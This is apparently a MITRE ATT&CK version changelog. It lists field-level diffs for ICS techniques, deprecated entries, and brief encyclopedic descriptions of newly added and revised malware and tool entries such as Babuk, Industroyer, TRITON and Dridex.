x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesProcess: Process Creation

[T0859] Valid Accounts

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Authentication logsLogon Session: Logon Session Creation
x_mitre_data_sources[1]Process monitoringUser Account: User Account Authentication

[T0860] Wireless Compromise

Current version: 0.0

Details
values_changed
STIX FieldOld valueNew Value
modified2020-05-21 17:43:26.506000+00:002021-10-08 15:25:32.143000+00:00
x_mitre_data_sources[0]Network protocol analysisNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Packet captureApplication Log: Application Log Content
x_mitre_data_sources[2]Network intrusion detection systemLogon Session: Logon Session Creation
x_mitre_platforms[0]WindowsControl Server
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsField Controller/RTU/PLC/IED
x_mitre_platformsInput/Output Server
Deprecations

[T0810] Data Historian Compromise

Current version: 0.0

Description: Adversaries may compromise and gain control of a data historian to gain a foothold into the control system environment. Access to a data historian may be used to learn stored database archival and analysis information on the control system. A dual-homed data historian may provide adversaries an interface from the IT environment to the OT environment. Dragos has released an updated analysis on CrashOverride that outlines the attack from the ICS network breach to payload delivery and execution. (Citation: Industroyer - Dragos - 201810) The report summarized that CrashOverride represents a new application of malware, but relied on standard intrusion techniques. In particular, new artifacts include references to a Microsoft Windows Server 2003 host, with a SQL Server. Within the ICS environment, such a database server can act as a data historian. Dragos noted a device with this role should be "expected to have extensive connections" within the ICS environment. Adversary activity leveraged database capabilities to perform reconnaissance, including directory queries and network connectivity checks. Permissions Required: Administrator Contributors: Joe Slowik - Dragos

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedTrue

[T0818] Engineering Workstation Compromise

Current version: 0.0

Description: Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedTrue
values_changed
STIX FieldOld valueNew Value
descriptionAdversaries may compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.

Software

enterprise-attack

New Software

[S0622] AppleSeed

Current version: 1.0

Description: [AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021)


[S0640] Avaddon

Current version: 1.0

Description: [Avaddon](https://attack.mitre.org/software/S0640) is ransomware written in C++ that has been offered as Ransomware-as-a-Service (RaaS) since at least June 2020.(Citation: Awake Security Avaddon)(Citation: Arxiv Avaddon Feb 2021)


[S0642] BADFLICK

Current version: 1.0

Description: [BADFLICK](https://attack.mitre.org/software/S0642) is a backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065) in spearphishing campaigns first reported in 2018 that targeted the U.S. engineering and maritime industries.(Citation: FireEye Periscope March 2018)(Citation: Accenture MUDCARP March 2019)


[S0657] BLUELIGHT

Current version: 1.0

Description: [BLUELIGHT](https://attack.mitre.org/software/S0657) is a remote access Trojan used by [APT37](https://attack.mitre.org/groups/G0067) that was first observed in early 2021.(Citation: Volexity InkySquid BLUELIGHT August 2021)


[S0638] Babuk

Current version: 1.0

Description: [Babuk](https://attack.mitre.org/software/S0638) is a Ransomware-as-a-service (RaaS) malware that has been used since at least 2021. The operators of [Babuk](https://attack.mitre.org/software/S0638) employ a "Big Game Hunting" approach to targeting major enterprises and operate a leak site to post stolen data as part of their extortion scheme.(Citation: Sogeti CERT ESEC Babuk March 2021)(Citation: McAfee Babuk February 2021)(Citation: CyberScoop Babuk February 2021)


[S0606] Bad Rabbit

Current version: 1.0

Description: [Bad Rabbit](https://attack.mitre.org/software/S0606) is a self-propagating ransomware that affected the Ukrainian transportation sector in 2017. [Bad Rabbit](https://attack.mitre.org/software/S0606) has also targeted organizations and consumers in Russia. (Citation: Secure List Bad Rabbit)(Citation: ESET Bad Rabbit)(Citation: Dragos IT ICS Ransomware)


[S0635] BoomBox

Current version: 1.0

Description: [BoomBox](https://attack.mitre.org/software/S0635) is a downloader responsible for executing next stage components that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)


[S0651] BoxCaon

Current version: 1.0

Description: [BoxCaon](https://attack.mitre.org/software/S0651) is a Windows backdoor that was used by [IndigoZebra](https://attack.mitre.org/groups/G0136) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://attack.mitre.org/software/S0651)'s name stems from similarities shared with the malware family [xCaon](https://attack.mitre.org/software/S0653).(Citation: Checkpoint IndigoZebra July 2021)


[S0631] Chaes

Current version: 1.0

Description: [Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)


[S0611] Clop

Current version: 1.0

Description: [Clop](https://attack.mitre.org/software/S0611) is a ransomware family that was first observed in February 2019 and has been used against retail, transportation and logistics, education, manufacturing, engineering, automotive, energy, financial, aerospace, telecommunications, professional and legal services, healthcare, and high tech industries. [Clop](https://attack.mitre.org/software/S0611) is a variant of the CryptoMix ransomware.(Citation: Mcafee Clop Aug 2019)(Citation: Cybereason Clop Dec 2020)(Citation: Unit42 Clop April 2021)


[S0608] Conficker

Current version: 1.0

Description: [Conficker](https://attack.mitre.org/software/S0608) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.(Citation: SANS Conficker) In 2016, a variant of [Conficker](https://attack.mitre.org/software/S0608) made its way on computers and removable disk drives belonging to a nuclear power plant.(Citation: Conficker Nuclear Power Plant)


[S0614] CostaBricks

Current version: 1.0

Description: [CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)


[S0625] Cuba

Current version: 1.0

Description: [Cuba](https://attack.mitre.org/software/S0625) is a Windows-based ransomware family that has been used against financial institutions, technology, and logistics organizations in North and South America as well as Europe since at least December 2019.(Citation: McAfee Cuba April 2021)


[S0616] DEATHRANSOM

Current version: 1.0

Description: [DEATHRANSOM](https://attack.mitre.org/software/S0616) is ransomware written in C that has been used since at least 2020, and has potential overlap with [FIVEHANDS](https://attack.mitre.org/software/S0618) and [HELLOKITTY](https://attack.mitre.org/software/S0617).(Citation: FireEye FiveHands April 2021)


[S0605] EKANS

Current version: 1.0

Description: [EKANS](https://attack.mitre.org/software/S0605) is ransomware variant that first appeared in mid-December 2019. [EKANS](https://attack.mitre.org/software/S0605) is distinct from other ransomware as it was written in Golang and aims to stop services and processes related to Industrial Control Systems.(Citation: Dragos EKANS)(Citation: Palo Alto Unit 42 EKANS)


[S0624] Ecipekac

Current version: 1.0

Description: [Ecipekac](https://attack.mitre.org/software/S0624) is a multi-layer loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2019 including use as a loader for [P8RAT](https://attack.mitre.org/software/S0626), [SodaMaster](https://attack.mitre.org/software/S0627), and [FYAnti](https://attack.mitre.org/software/S0628).(Citation: Securelist APT10 March 2021)


[S0634] EnvyScout

Current version: 1.0

Description: [EnvyScout](https://attack.mitre.org/software/S0634) is a dropper that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)


[S0618] FIVEHANDS

Current version: 1.0

Description: [FIVEHANDS](https://attack.mitre.org/software/S0618) is a customized version of [DEATHRANSOM](https://attack.mitre.org/software/S0616) ransomware written in C++. [FIVEHANDS](https://attack.mitre.org/software/S0618) has been used since at least 2021, including in Ransomware-as-a-Service (RaaS) campaigns, sometimes along with [SombRAT](https://attack.mitre.org/software/S0615).(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)


[S0628] FYAnti

Current version: 1.0

Description: [FYAnti](https://attack.mitre.org/software/S0628) is a loader that has been used by [menuPass](https://attack.mitre.org/groups/G0045) since at least 2020, including to deploy [QuasarRAT](https://attack.mitre.org/software/S0262).(Citation: Securelist APT10 March 2021)


[S0632] GrimAgent

Current version: 1.0

Description: [GrimAgent](https://attack.mitre.org/software/S0632) is a backdoor that has been used before the deployment of [Ryuk](https://attack.mitre.org/software/S0446) ransomware since at least 2020; it is likely used by [FIN6](https://attack.mitre.org/groups/G0037) and [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Group IB GrimAgent July 2021)


[S0617] HELLOKITTY

Current version: 1.0

Description: [HELLOKITTY](https://attack.mitre.org/software/S0617) is a ransomware written in C++ that shares similar code structure and functionality with [DEATHRANSOM](https://attack.mitre.org/software/S0616) and [FIVEHANDS](https://attack.mitre.org/software/S0618). [HELLOKITTY](https://attack.mitre.org/software/S0617) has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.(Citation: FireEye FiveHands April 2021)


[S0604] Industroyer

Current version: 1.0

Description: [Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)


[S0648] JSS Loader

Current version: 1.0

Description: [JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)


[S0607] KillDisk

Current version: 1.0

Description: [KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)


[S0641] Kobalos

Current version: 1.0

Description: [Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)


[S0513] LiteDuke

Current version: 1.0

Description: [LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)


[S0652] MarkiRAT

Current version: 1.0

Description: [MarkiRAT](https://attack.mitre.org/software/S0652) is a remote access Trojan (RAT) compiled with Visual Studio that has been used by [Ferocious Kitten](https://attack.mitre.org/groups/G0137) since at least 2015.(Citation: Kaspersky Ferocious Kitten Jun 2021)


[S0637] NativeZone

Current version: 1.0

Description: [NativeZone](https://attack.mitre.org/software/S0637) is the name given collectively to disposable custom [Cobalt Strike](https://attack.mitre.org/software/S0154) loaders used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)


[S0630] Nebulae

Current version: 1.0

Description: [Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)


[S0644] ObliqueRAT

Current version: 1.0

Description: [ObliqueRAT](https://attack.mitre.org/software/S0644) is a remote access trojan, similar to [Crimson](https://attack.mitre.org/software/S0115), that has been in use by [Transparent Tribe](https://attack.mitre.org/groups/G0134) since at least 2020.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)


[S0626] P8RAT

Current version: 1.0

Description: [P8RAT](https://attack.mitre.org/software/S0626) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)


[S0613] PS1

Current version: 1.0

Description: [PS1](https://attack.mitre.org/software/S0613) is a loader that was used to deploy 64-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)


[S0643] Peppy

Current version: 1.0

Description: [Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)


[S0654] ProLock

Current version: 1.0

Description: [ProLock](https://attack.mitre.org/software/S0654) is a ransomware strain that has been used in Big Game Hunting (BGH) operations since at least 2020, often obtaining initial access with [QakBot](https://attack.mitre.org/software/S0650). [ProLock](https://attack.mitre.org/software/S0654) is the successor to PwndLocker ransomware which was found to contain a bug allowing decryption without ransom payment in 2019.(Citation: Group IB Ransomware September 2020)


[S0650] QakBot

Current version: 1.0

Description: [QakBot](https://attack.mitre.org/software/S0650) is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. [QakBot](https://attack.mitre.org/software/S0650) is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably [ProLock](https://attack.mitre.org/software/S0654) and [Egregor](https://attack.mitre.org/software/S0554).(Citation: Trend Micro Qakbot December 2020)(Citation: Red Canary Qbot)(Citation: Kaspersky QakBot September 2021)(Citation: ATT QakBot April 2021)


[S0629] RainyDay

Current version: 1.0

Description: [RainyDay](https://attack.mitre.org/software/S0629) is a backdoor tool that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)


[S0649] SMOKEDHAM

Current version: 1.0

Description: [SMOKEDHAM](https://attack.mitre.org/software/S0649) is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.(Citation: FireEye Shining A Light on DARKSIDE May 2021)(Citation: FireEye SMOKEDHAM June 2021)


[S0639] Seth-Locker

Current version: 1.0

Description: [Seth-Locker](https://attack.mitre.org/software/S0639) is a ransomware with some remote control capabilities that has been in use since at least 2021. (Citation: Trend Micro Ransomware February 2021)


[S0610] SideTwist

Current version: 1.0

Description: [SideTwist](https://attack.mitre.org/software/S0610) is a C-based backdoor that has been used by [OilRig](https://attack.mitre.org/groups/G0049) since at least 2021.(Citation: Check Point APT34 April 2021)


[S0623] Siloscape

Current version: 1.0

Description: [Siloscape](https://attack.mitre.org/software/S0623) is malware that targets Kubernetes clusters through Windows containers. [Siloscape](https://attack.mitre.org/software/S0623) was first observed in March 2021.(Citation: Unit 42 Siloscape Jun 2021)


[S0633] Sliver

Current version: 1.0

Description: [Sliver](https://attack.mitre.org/software/S0633) is an open source, cross-platform, red team command and control framework written in Golang.(Citation: Bishop Fox Sliver Framework August 2019)


[S0627] SodaMaster

Current version: 1.0

Description: [SodaMaster](https://attack.mitre.org/software/S0627) is a fileless malware used by [menuPass](https://attack.mitre.org/groups/G0045) to download and execute payloads since at least 2020.(Citation: Securelist APT10 March 2021)


[S0615] SombRAT

Current version: 1.0

Description: [SombRAT](https://attack.mitre.org/software/S0615) is a modular backdoor written in C++ that has been in use since at least 2019. [SombRAT](https://attack.mitre.org/software/S0615) has been used to download and execute malicious payloads, including [FIVEHANDS](https://attack.mitre.org/software/S0618) ransomware.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)


[S0646] SpicyOmelette

Current version: 1.0

Description: [SpicyOmelette](https://attack.mitre.org/software/S0646) is a JavaScript based remote access tool that has been used by [Cobalt Group](https://attack.mitre.org/groups/G0080) since at least 2018.(Citation: Secureworks GOLD KINGSWOOD September 2018)


[S0603] Stuxnet

Current version: 1.0

Description: [Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)


[S0609] TRITON

Current version: 1.0

Description: [TRITON](https://attack.mitre.org/software/S0609) is an attack framework built to interact with Triconex Safety Instrumented System (SIS) controllers. [TRITON](https://attack.mitre.org/software/S0609) was deployed against at least one target in the Middle East. (Citation: FireEye TRITON 2017)(Citation: FireEye TRITON 2018)(Citation: Dragos TRISIS)(Citation: CISA HatMan)(Citation: FireEye TEMP.Veles 2018)


[S0647] Turian

Current version: 1.0

Description: [Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)


[S0636] VaporRage

Current version: 1.0

Description: [VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)


[S0612] WastedLocker

Current version: 1.0

Description: [WastedLocker](https://attack.mitre.org/software/S0612) is a ransomware family attributed to [Indrik Spider](https://attack.mitre.org/groups/G0119) that has been used since at least May 2020. [WastedLocker](https://attack.mitre.org/software/S0612) has been used against a broad variety of sectors, including manufacturing, information technology, and media.(Citation: Symantec WastedLocker June 2020)(Citation: NCC Group WastedLocker June 2020)(Citation: Sentinel Labs WastedLocker July 2020)


[S0645] Wevtutil

Current version: 1.0

Description: [Wevtutil](https://attack.mitre.org/software/S0645) is a Windows command-line utility that enables administrators to retrieve information about event logs and publishers.(Citation: Wevtutil Microsoft Documentation)


[S0658] XCSSET

Current version: 1.0

Description: [XCSSET](https://attack.mitre.org/software/S0658) is a macOS modular backdoor that targets Xcode application developers. [XCSSET](https://attack.mitre.org/software/S0658) was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.(Citation: trendmicro xcsset xcode project 2020)


[S0653] xCaon

Current version: 1.0

Description: [xCaon](https://attack.mitre.org/software/S0653) is an HTTP variant of the [BoxCaon](https://attack.mitre.org/software/S0651) malware family that has used by [IndigoZebra](https://attack.mitre.org/groups/G0136) since at least 2014. [xCaon](https://attack.mitre.org/software/S0653) has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

Major Version Changes

[S0234] Bandook

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Bandook](https://attack.mitre.org/software/S0234) is a commt1[Bandook](https://attack.mitre.org/software/S0234) is a comm
>ercially available RAT, written in Delphi, which has been av>ercially available RAT, written in Delphi and C++, that has 
>ailable since roughly 2007  (Citation: EFF Manul Aug 2016) (>been available since at least 2007. It has been used against
>Citation: Lookout Dark Caracal Jan 2018).> government, financial, energy, healthcare, education, IT, a
 >nd legal organizations in the US, South America, Europe, and
 > Southeast Asia. [Bandook](https://attack.mitre.org/software
 >/S0234) has been used by [Dark Caracal](https://attack.mitre
 >.org/groups/G0070), as well as in a separate campaign referr
 >ed to as "Operation Manul".(Citation: EFF Manul Aug 2016)(Ci
 >tation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint 
 >Bandook Nov 2020)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 15:08:51.834000+00:002021-10-11 19:42:14.066000+00:00
description[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi, which has been available since roughly 2007 (Citation: EFF Manul Aug 2016) (Citation: Lookout Dark Caracal Jan 2018).[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi and C++, that has been available since at least 2007. It has been used against government, financial, energy, healthcare, education, IT, and legal organizations in the US, South America, Europe, and Southeast Asia. [Bandook](https://attack.mitre.org/software/S0234) has been used by [Dark Caracal](https://attack.mitre.org/groups/G0070), as well as in a separate campaign referred to as "Operation Manul".(Citation: EFF Manul Aug 2016)(Citation: Lookout Dark Caracal Jan 2018)(Citation: CheckPoint Bandook Nov 2020)
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CheckPoint Bandook Nov 2020', 'description': 'Check Point. (2020, November 26). Bandook: Signed & Delivered. Retrieved May 31, 2021.', 'url': 'https://research.checkpoint.com/2020/bandook-signed-delivered/'}

[S0281] Dok

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Dok](https://attack.mitre.org/software/S0281) steals bankint1[Dok](https://attack.mitre.org/software/S0281) is a Trojan a
>g information through man-in-the-middle  (Citation: objsee m>pplication disguised as a .zip file that is able to collect 
>ac malware 2017).>user credentials and install a malicious proxy server to red
 >irect a user's network traffic (i.e. [Adversary-in-the-Middl
 >e](https://attack.mitre.org/techniques/T1557)).(Citation: ob
 >jsee mac malware 2017)(Citation: hexed osx.dok analysis 2019
 >)(Citation: CheckPoint Dok)
Details
values_changed
STIX FieldOld valueNew Value
modified2020-03-19 19:08:28.695000+00:002021-10-12 11:26:16.316000+00:00
description[Dok](https://attack.mitre.org/software/S0281) steals banking information through man-in-the-middle (Citation: objsee mac malware 2017).[Dok](https://attack.mitre.org/software/S0281) is a Trojan application disguised as a .zip file that is able to collect user credentials and install a malicious proxy server to redirect a user's network traffic (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)).(Citation: objsee mac malware 2017)(Citation: hexed osx.dok analysis 2019)(Citation: CheckPoint Dok)
external_references[1]['description'](Citation: objsee mac malware 2017).(Citation: objsee mac malware 2017)
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'hexed osx.dok analysis 2019', 'description': 'fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.', 'url': 'http://www.hexed.in/2019/07/osxdok-analysis.html'}
external_references{'source_name': 'CheckPoint Dok', 'description': 'Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.', 'url': 'https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/'}

[S0384] Dridex

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1[Dridex](https://attack.mitre.org/software/S0384) is a bankit1[Dridex](https://attack.mitre.org/software/S0384) is a proli
>ng Trojan that has been used for financial gain. Dridex was >fic banking Trojan that first appeared in 2014. By December 
>created from the source code of the Bugat banking trojan (al>2019, the US Treasury estimated [Dridex](https://attack.mitr
>so known as Cridex).(Citation: Dell Dridex Oct 2015)(Citatio>e.org/software/S0384) had infected computers in hundreds of 
>n: Kaspersky Dridex May 2017)>banks and financial institutions in over 40 countries, leadi
 >ng to more than $100 million in theft. [Dridex](https://atta
 >ck.mitre.org/software/S0384) was created from the source cod
 >e of the Bugat banking Trojan (also known as Cridex).(Citati
 >on: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 201
 >7)(Citation: Treasury EvilCorp Dec 2019)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Daniyal Naeem, BT Security']
dictionary_item_removed
STIX FieldOld valueNew Value
external_referenceshttps://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
values_changed
STIX FieldOld valueNew Value
modified2020-03-30 16:20:01.787000+00:002021-10-01 20:30:30.043000+00:00
description[Dridex](https://attack.mitre.org/software/S0384) is a banking Trojan that has been used for financial gain. Dridex was created from the source code of the Bugat banking trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)[Dridex](https://attack.mitre.org/software/S0384) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://attack.mitre.org/software/S0384) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://attack.mitre.org/software/S0384) was created from the source code of the Bugat banking Trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Treasury EvilCorp Dec 2019)
external_references[1]['source_name']Bugat v5Dridex
external_references[1]['description'](Citation: Dell Dridex Oct 2015)(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Checkpoint Dridex Jan 2021)
external_references[2]['source_name']Dell Dridex Oct 2015Bugat v5
external_references[2]['description']Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.(Citation: Dell Dridex Oct 2015)
external_references[3]['source_name']Kaspersky Dridex May 2017Dell Dridex Oct 2015
external_references[3]['description']Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, October 13). Dridex (Bugat v5) Botnet Takeover Operation. Retrieved May 31, 2019.
external_references[3]['url']https://securelist.com/dridex-a-history-of-evolution/78531/https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
x_mitre_version1.12.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Kaspersky Dridex May 2017', 'description': 'Slepogin, N. (2017, May 25). Dridex: A History of Evolution. Retrieved May 31, 2019.', 'url': 'https://securelist.com/dridex-a-history-of-evolution/78531/'}
external_references{'source_name': 'Treasury EvilCorp Dec 2019', 'description': 'U.S. Department of Treasury. (2019, December 5). Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware. Retrieved September 15, 2021.', 'url': 'https://home.treasury.gov/news/press-releases/sm845'}
external_references{'source_name': 'Checkpoint Dridex Jan 2021', 'description': 'Check Point Research. (2021, January 4). Stopping Serial Killer: Catching the Next Strike. Retrieved September 7, 2021.', 'url': 'https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/'}

[S0561] GuLoader

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1[GuLoader](https://attack.mitre.org/software/S0561) is a filt1[GuLoader](https://attack.mitre.org/software/S0561) is a fil
>e downloader that has been used since at least December 2019>e downloader that has been used since at least December 2019
> to distribute a variety of remote administration tool (RAT)> to distribute a variety of remote administration tool (RAT)
> malware, including [NETWIRE](https://attack.mitre.org/softw> malware, including [NETWIRE](https://attack.mitre.org/softw
>are/S0198).(Citation: Unit 42 NETWIRE April 2020)>are/S0198), [Agent Tesla](https://attack.mitre.org/software/
 >S0331), [NanoCore](https://attack.mitre.org/software/S0336),
 > FormBook, and Parallax RAT.(Citation: Unit 42 NETWIRE April
 > 2020)(Citation: Medium Eli Salem GuLoader April 2021)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_contributors['Eli Salem, @elisalem9']
values_changed
STIX FieldOld valueNew Value
modified2021-04-20 21:06:08.972000+00:002021-10-15 19:14:33.244000+00:00
